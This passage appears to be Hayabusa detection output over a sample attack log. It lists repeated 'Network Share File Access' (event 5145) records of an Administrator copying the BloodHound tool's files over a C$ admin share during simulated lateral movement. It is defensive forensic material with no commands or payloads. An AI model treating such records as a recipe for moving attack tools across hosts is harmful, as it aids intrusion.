10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\css : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\fonts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\fonts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\grunt : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.287 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\less : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.287 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\less\mixins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator 
: Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap-3-typeahead : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea\inspectionProfiles : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea\markdown-navigator : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\brace-expansion : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-from : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-indexof-polyfill : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-indexof-polyfill\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-shims : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share 
Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw\test : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\classnames : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\colors : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\colors\themes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\commander : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\commander\typings : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: 
\\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map\example : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-stream : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\conf : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\build : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\client : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\core : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es5 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es6 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es7 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: 
\\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\array : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\date : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\dom-collections : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\error : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\function : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\json : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\map : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\math : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\number : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\object : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\promise : IP Address: 